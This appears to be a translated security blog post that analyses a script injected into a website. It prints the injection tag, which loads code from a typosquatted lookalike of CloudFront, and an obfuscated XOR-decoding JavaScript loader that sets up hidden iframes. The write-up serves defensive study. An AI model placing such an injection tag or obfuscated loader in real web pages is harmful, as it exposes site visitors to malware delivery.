A Research on a suspicious Payload

A Research on a suspicious Payload

Letter difference

When we find suspicious Payload, we will try to study it. Maybe they won't have any problems during our detection, but it doesn't mean they have no problems.

A Payload found under a website is an excellent example:

<!-- [if IE]><script type="text/javascript" src="hxxp://cloudfrond.org/golden.phtml"></script> <![endif]-->

It looks okay, right? CloudFront is a CDN service for Amazon web, which is very secure ...... Please take a closer look? Okay, CloudFrond = CloudFront. If you have a letter, you may be lucky.

Analyze Payload

Now let's take a look at what the script loads:

/*jskdljgdlkfjgdlkfg*/XJHNOs=print;rNjoDPv=String;RlH=rNjoDPv["fromCharCode"];crgLMK=parseInt;utO=function(a,b){return a.charAt(b);};var dOK='';var Glg='7d3d099208132cbb18d70636c524b94077a6e879d602dbfa0813ff71fd18bf53005c3a50932616ee71ad68bf114f9b6349e5431abc4509b7ad5e054778acbad4c34806e724b3eb7913224c745465249d8d6456f5b3442031ce9422be75f678e7b0c63fe25b3ad7a0c2935b2338079d55a1a972dafc0a1cfdf32f6151017843c3fba4e33a0c11517839376a3372772d557b98';var SUTbVRi='733b2ab628364cd076b5755fae4e9c281aca9319b45db58b6f82dc199e6ee17a0f5a1c75b80939d20ca5669f3270bb486d842273e07923d4cf2c696c16c7deb3bd0c63d1088dcc54312264487d5e49e07b207a5873a87d2b8f5cd181ca03294f089b6e230f52da53be966b2f297a330a4bb6afb3b15c954b76332b488da0a20766b9a9e0a23c1cbc7c856413a6be76669b1dbcd66acdb32aaa0d8f2bceafc65166dc84b91c8c652e79485c7575a56cd97c2cb91fa8b56e483f2c23dedf0aaf54cb5784902e6d68a16357823008e3300fd1b6d1b5c4b20d075309a66d667eb9a90e38d81448204db97e8d070a7d1c3012562e4b261ddb6729873cc415c4a90e431eabaf152c50b5';var w=0x0+0;for(var i=0;i<(Glg.length/2);i++){dOK+=RlH(crgLMK(utO(Glg,w)+utO(Glg,w+1),0x8+8)^crgLMK(utO(SUTbVRi,w)+utO(SUTbVRi,w+1),0x0F+1));w+=2;

The above is actually a custom Encoded Script, And the content you load each time you access is different (it is a Payload that varies according to the condition ).

If you access it in IE, it only changes the variables. If you use another browser or access it with another user-agent, the output becomes completely uncontrollable:

If you use IE to access the obtained content, we can decode it. Although it looks very suspicious, we have not found any malicious payload. below is the traffic package we intercepted:

Here, it uses a pixel iframe framework to load a certain google webpage before loading its next function.

However, this function returns a 404 value. We guess the referenced function has become unavailable, or hackers have already banned it.

The Code also shows two main functions:

1. Create an iFrame

 

2. The same encoding method is used in the main payload to hide the URL in the iframe framework.